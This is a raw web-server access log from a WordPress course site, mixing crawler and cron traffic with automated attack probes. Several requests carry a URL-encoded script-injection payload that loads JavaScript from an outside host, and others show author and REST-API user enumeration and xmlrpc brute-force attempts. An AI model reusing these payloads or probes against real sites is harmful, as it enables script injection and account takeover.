156.228.171.235 - - [02/May/2025:16:16:25 +0330] "GET /wp-login.php HTTP/1.1" 302 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.171.235 - - [02/May/2025:16:16:37 +0330] "GET /not-found/ HTTP/1.1" 404 15809 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
94.102.49.19 - - [02/May/2025:16:16:43 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:16:16:47 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
31.214.174.196 - - [02/May/2025:16:19:23 +0330] "POST /?wordfence_syncAttackData=1746190163.4231 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [02/May/2025:16:19:25 +0330] "POST /wp-cron.php?doing_wp_cron=1746190165.0497069358825683593750 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
154.213.202.81 - - [02/May/2025:16:19:22 +0330] "GET /?author=1 HTTP/1.1" 404 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
154.213.202.81 - - [02/May/2025:16:19:27 +0330] "POST /xmlrpc.php HTTP/1.1" 200 132 "-" "Apache-HttpClient/4.5.13 (Java/11.0.26)"
154.213.202.81 - - [02/May/2025:16:19:34 +0330] "GET /wp-login.php HTTP/1.1" 302 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
154.213.202.81 - - [02/May/2025:16:19:45 +0330] "GET /wp-login.php HTTP/1.1" 302 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
154.213.202.81 - - [02/May/2025:16:19:48 +0330] "GET /not-found HTTP/1.1" 301 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.174.24 - - [02/May/2025:16:19:54 +0330] "GET /?author=1 HTTP/1.1" 404 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.174.24 - - [02/May/2025:16:19:57 +0330] "POST /xmlrpc.php HTTP/1.1" 200 132 "-" "Apache-HttpClient/4.5.13 (Java/11.0.26)"
156.228.174.24 - - [02/May/2025:16:20:03 +0330] "GET /wp-login.php HTTP/1.1" 302 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
31.214.174.196 - - [02/May/2025:16:20:06 +0330] "POST /wp-cron.php?doing_wp_cron=1746190206.7571310997009277343750 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
156.228.174.24 - - [02/May/2025:16:20:09 +0330] "GET /not-found/ HTTP/1.1" 404 15809 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.174.24 - - [02/May/2025:16:20:14 +0330] "GET /not-found HTTP/1.1" 301 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.174.24 - - [02/May/2025:16:20:17 +0330] "GET /not-found/ HTTP/1.1" 404 15809 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
94.102.49.19 - - [02/May/2025:16:17:33 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
154.213.202.81 - - [02/May/2025:16:19:30 +0330] "POST /xmlrpc.php HTTP/1.1" 200 245 "-" "Apache-HttpClient/4.5.13 (Java/11.0.26)"
154.213.202.81 - - [02/May/2025:16:19:38 +0330] "GET /not-found HTTP/1.1" 301 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
154.213.202.81 - - [02/May/2025:16:19:42 +0330] "GET /not-found/ HTTP/1.1" 404 15809 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
31.214.174.196 - - [02/May/2025:16:19:53 +0330] "POST /wp-cron.php?doing_wp_cron=1746190193.2662179470062255859375 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
156.228.174.24 - - [02/May/2025:16:19:51 +0330] "GET /wp-json/wp/v2/users HTTP/1.1" 401 166 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
154.213.202.81 - - [02/May/2025:16:19:52 +0330] "GET /not-found/ HTTP/1.1" 404 15809 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.174.24 - - [02/May/2025:16:19:59 +0330] "POST /xmlrpc.php HTTP/1.1" 200 245 "-" "Apache-HttpClient/4.5.13 (Java/11.0.26)"
156.228.174.24 - - [02/May/2025:16:20:05 +0330] "GET /not-found HTTP/1.1" 301 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.174.24 - - [02/May/2025:16:20:13 +0330] "GET /wp-login.php HTTP/1.1" 302 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
54.244.63.85 - - [02/May/2025:16:22:17 +0330] "GET / HTTP/1.1" 200 279171 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
54.244.63.85 - - [02/May/2025:16:22:22 +0330] "GET //wp-includes/wlwmanifest.xml HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
54.244.63.85 - - [02/May/2025:16:22:25 +0330] "GET //xmlrpc.php?rsd HTTP/1.1" 200 787 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
54.244.63.85 - - [02/May/2025:16:22:28 +0330] "GET //?author=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
54.244.63.85 - - [02/May/2025:16:22:30 +0330] "GET //?author=2 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
54.244.63.85 - - [02/May/2025:16:22:33 +0330] "GET //wp-json/wp/v2/users/ HTTP/1.1" 401 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
54.244.63.85 - - [02/May/2025:16:22:36 +0330] "GET //wp-json/oembed/1.0/embed?url=https://optimyar.com/ HTTP/1.1" 200 3519 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
54.244.63.85 - - [02/May/2025:16:22:39 +0330] "POST //xmlrpc.php HTTP/1.1" 503 19533 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36"
54.36.148.164 - - [02/May/2025:16:23:17 +0330] "GET /sitemap_index.xml HTTP/2" 200 344 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.225 - - [02/May/2025:16:24:05 +0330] "GET /page-sitemap.xml HTTP/2" 200 4657 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.85 - - [02/May/2025:16:24:19 +0330] "GET /elementskit_content-sitemap.xml HTTP/2" 200 1565 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
31.214.174.196 - - [02/May/2025:16:28:43 +0330] "POST /?wordfence_syncAttackData=1746190723.5876 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
62.113.113.162 - - [02/May/2025:16:28:42 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
31.214.174.196 - - [02/May/2025:16:20:39 +0330] "POST /wp-cron.php?doing_wp_cron=1746190239.8883190155029296875000 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
146.70.172.38 - - [02/May/2025:16:20:38 +0330] "GET / HTTP/1.0" 200 32565 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
54.36.148.210 - - [02/May/2025:16:23:07 +0330] "GET /robots.txt HTTP/2" 200 123 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
31.214.174.196 - - [02/May/2025:16:23:19 +0330] "POST /wp-cron.php?doing_wp_cron=1746190399.3856019973754882812500 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
54.36.148.197 - - [02/May/2025:16:23:55 +0330] "GET /post-sitemap.xml HTTP/2" 200 832 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
93.123.109.101 - - [02/May/2025:16:25:36 +0330] "GET /wp-content/plugins/jet-tabs/assets/js/jet-tabs-frontend.min.js?ver=2.2.8 HTTP/1.1" 200 5800 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0"
31.214.174.196 - - [02/May/2025:16:28:45 +0330] "POST /wp-cron.php?doing_wp_cron=1746190725.2917389869689941406250 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
94.102.49.19 - - [02/May/2025:16:32:13 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
18.139.77.112 - - [02/May/2025:16:47:28 +0330] "GET /wp-content/uploads/2022/10/%D8%A8%D9%87%DB%8C%D9%86%D9%87_%D8%B3%D8%A7%D8%B2%DB%8C.png HTTP/2" 200 51302 "-" "python-requests/2.30.0"
31.214.174.196 - - [02/May/2025:16:51:09 +0330] "POST /wp-cron.php?doing_wp_cron=1746192069.7456009387969970703125 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [02/May/2025:16:51:08 +0330] "POST /?wordfence_syncAttackData=1746192068.0051 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [02/May/2025:16:51:14 +0330] "POST /wp-admin/admin-ajax.php?action=wordfence_testAjax HTTP/1.1" 200 32 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [02/May/2025:16:51:19 +0330] "GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=0&scanMode=quick&cronKey=a7cb30701b3c18ccea38bae9d78ce562&signature=c465f4d67c06c24851ef3ef5009107bafdd26bc2db6418103052e65648f5cccc HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
164.90.166.111 - - [02/May/2025:16:51:06 +0330] "GET / HTTP/1.1" 200 32577 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0"
31.214.174.196 - - [02/May/2025:17:00:48 +0330] "POST /?wordfence_syncAttackData=1746192648.709 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
195.2.75.216 - - [02/May/2025:17:00:47 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
95.24.129.159 - - [02/May/2025:17:07:11 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
95.24.129.159 - - [02/May/2025:17:07:17 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
95.24.129.159 - - [02/May/2025:17:07:21 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
69.171.231.113 - - [02/May/2025:17:07:47 +0330] "GET /robots.txt HTTP/2" 200 0 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
40.77.167.25 - - [02/May/2025:17:10:58 +0330] "GET /?o=446470884 HTTP/2" 200 32577 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
31.214.174.196 - - [02/May/2025:17:07:13 +0330] "POST /wp-cron.php?doing_wp_cron=1746193033.2922201156616210937500 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
40.77.167.136 - - [02/May/2025:17:11:19 +0330] "GET /wp-content/plugins/elementor-extras/assets/lib/hotips/hotips.min.js?ver=1.1.0 HTTP/2" 200 2121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.136 - - [02/May/2025:17:11:20 +0330] "GET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/2" 200 6812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.64.128 - - [02/May/2025:17:11:33 +0330] "GET /?o=273852384 HTTP/1.1" 200 32579 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.95 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
31.214.174.196 - - [02/May/2025:17:22:20 +0330] "POST /wp-cron.php?doing_wp_cron=1746193940.1904289722442626953125 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
54.37.234.111 - - [02/May/2025:17:22:16 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
54.37.234.111 - - [02/May/2025:17:22:23 +0330] "POST /wp-admin/admin-ajax.php HTTP/1.0" 200 607 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
157.55.39.223 - - [02/May/2025:17:27:37 +0330] "GET /robots.txt HTTP/2" 200 123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.223 - - [02/May/2025:17:27:37 +0330] "GET /robots.txt HTTP/2" 200 123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
31.214.174.196 - - [02/May/2025:17:27:38 +0330] "POST /wp-cron.php?doing_wp_cron=1746194258.7834739685058593750000 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
157.55.39.223 - - [02/May/2025:17:27:36 +0330] "GET /robots.txt HTTP/2" 200 123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
31.214.174.196 - - [02/May/2025:17:22:18 +0330] "POST /?wordfence_syncAttackData=1746193938.4221 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
93.123.109.101 - - [02/May/2025:17:24:38 +0330] "GET /e HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0"
93.123.109.101 - - [02/May/2025:17:24:41 +0330] "GET /elementor-34777/ HTTP/1.1" 200 83030 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0"
94.102.49.19 - - [02/May/2025:17:38:31 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:17:38:40 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
31.214.174.196 - - [02/May/2025:17:42:58 +0330] "POST /?wordfence_syncAttackData=1746195178.8585 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [02/May/2025:17:43:00 +0330] "POST /wp-cron.php?doing_wp_cron=1746195180.4938480854034423828125 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
117.62.235.53 - - [02/May/2025:17:42:57 +0330] "GET / HTTP/1.1" 200 32579 "http://optimyar.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
46.63.254.6 - - [02/May/2025:17:43:26 +0330] "POST /wp-admin/admin-ajax.php HTTP/1.0" 200 607 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
178.20.45.159 - - [02/May/2025:17:44:02 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
195.2.78.191 - - [02/May/2025:17:31:53 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
94.102.49.19 - - [02/May/2025:17:34:22 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
46.63.254.6 - - [02/May/2025:17:43:23 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
185.21.14.193 - - [02/May/2025:17:56:51 +0330] "GET / HTTP/1.1" 200 32577 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
202.62.52.20 - - [02/May/2025:17:57:08 +0330] "POST / HTTP/1.1" 200 32577 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
202.62.52.20 - - [02/May/2025:17:57:15 +0330] "POST / HTTP/1.1" 200 32577 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
202.62.52.20 - - [02/May/2025:17:57:22 +0330] "POST / HTTP/1.1" 200 32577 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
142.250.32.4 - - [02/May/2025:17:57:26 +0330] "GET /.well-known/traffic-advice HTTP/1.1" 404 15317 "-" "Chrome Privacy Preserving Prefetch Proxy"
185.21.14.193 - - [02/May/2025:17:57:28 +0330] "GET /comments/feed/ HTTP/1.1" 200 2386 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
185.21.14.193 - - [02/May/2025:17:57:32 +0330] "GET /courses/gams-la/ HTTP/1.1" 200 37836 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
202.62.52.20 - - [02/May/2025:17:58:04 +0330] "POST /courses/gams-la/ HTTP/1.1" 200 37837 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
202.62.52.20 - - [02/May/2025:17:58:11 +0330] "POST /courses/gams-la/ HTTP/1.1" 200 37837 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.21.14.193 - - [02/May/2025:17:58:15 +0330] "GET /courses/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%87%db%8c%d9%86%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d8%af%d8%b1-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-%d8%a8%d8%a7-%d9%be%da%a9%db%8c%d8%ac-%d9%87%d8%a7%db%8c-%da%af/ HTTP/1.1" 200 94830 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
202.62.52.20 - - [02/May/2025:17:58:28 +0330] "POST /wp-admin/admin-ajax.php?action=wpdAddSubscription HTTP/1.1" 200 80 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
91.142.73.116 - - [02/May/2025:17:58:32 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
202.62.52.20 - - [02/May/2025:17:58:33 +0330] "POST /courses/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%87%db%8c%d9%86%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d8%af%d8%b1-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-%d8%a8%d8%a7-%d9%be%da%a9%db%8c%d8%ac-%d9%87%d8%a7%db%8c-%da%af/ HTTP/1.1" 200 94831 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
202.62.52.20 - - [02/May/2025:17:58:40 +0330] "POST /courses/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%87%db%8c%d9%86%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d8%af%d8%b1-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-%d8%a8%d8%a7-%d9%be%da%a9%db%8c%d8%ac-%d9%87%d8%a7%db%8c-%da%af/ HTTP/1.1" 200 94830 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
202.62.52.20 - - [02/May/2025:17:58:58 +0330] "POST /courses/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%87%db%8c%d9%86%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d8%af%d8%b1-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-%d8%a8%d8%a7-%d9%be%da%a9%db%8c%d8%ac-%d9%87%d8%a7%db%8c-%da%af/ HTTP/1.1" 200 94828 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
31.214.174.196 - - [02/May/2025:17:56:52 +0330] "POST /?wordfence_syncAttackData=1746196012.5066 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [02/May/2025:17:56:54 +0330] "POST /wp-cron.php?doing_wp_cron=1746196014.1158950328826904296875 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
202.62.52.20 - - [02/May/2025:17:57:02 +0330] "POST / HTTP/1.1" 200 32577 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
193.186.4.3 - - [02/May/2025:17:57:28 +0330] "GET /courses/data-driven-robust-optimization/ HTTP/2" 200 13324 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
202.62.52.20 - - [02/May/2025:17:57:39 +0330] "POST /wp-admin/admin-ajax.php?action=wpdAddSubscription HTTP/1.1" 200 80 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
202.62.52.20 - - [02/May/2025:17:57:44 +0330] "POST /wp-admin/admin-ajax.php?action=wpdAddSubscription HTTP/1.1" 200 80 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
202.62.52.20 - - [02/May/2025:17:57:51 +0330] "POST /courses/gams-la/ HTTP/1.1" 200 37837 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
202.62.52.20 - - [02/May/2025:17:57:57 +0330] "POST /courses/gams-la/ HTTP/1.1" 200 37837 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
